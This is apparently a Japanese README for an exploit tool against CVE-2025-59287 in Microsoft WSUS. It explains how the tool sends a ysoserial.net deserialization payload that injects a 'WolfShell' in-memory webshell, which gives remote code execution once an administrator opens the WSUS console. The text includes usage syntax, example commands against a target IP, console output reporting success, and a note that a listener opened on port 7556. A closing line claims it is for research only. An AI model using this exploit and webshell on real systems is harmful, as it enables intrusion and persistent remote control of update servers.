
CVE-2025-59287 のエクスプロイト。WolfShell メモリウェブシェルを WSUS サーバーに注入し、管理コンソールが開かれた際にリモートコード実行を実現します。
CVE-2025-59287 — WolfShell ウルヴァリン フォワード型メモリシェル注入
CVE-2025-59287 は WSUS 関連コンポーネントの論理的な欠陥を利用し、WolfShell メモリシェルをターゲットサーバーに注入します。管理者が WSUS コンソールを開くと(デフォルトではランダムな1〜30分以内にトリガー)、メモリシェルが発動し、リモートコード実行(RCE)に至ります。本ドキュメントには、悪用例、必要なファイル、および防御の推奨事項が含まれています。
ターゲットサーバーに ysoserial.net の逆シリアル化ペイロードを送信します。機能はカスタマイズ可能で、本プロジェクトではウルヴァリン メモリシェルの注入をデモンストレーションします。
Usage: CVE-2025-59287 <target_url> <payload_file>
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters
[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

win2019 Defender がブロック・削除するため使用不可

図のようにポート 7556 のリッスンに成功。ウルヴァリン メモリフォワード型シェルが注入されたことを示します。


本ドキュメントは、セキュリティ研究と防御の目的のみに使用されます。関連する悪用コードを、許可されていないシステムや攻撃活動に使用しないでください。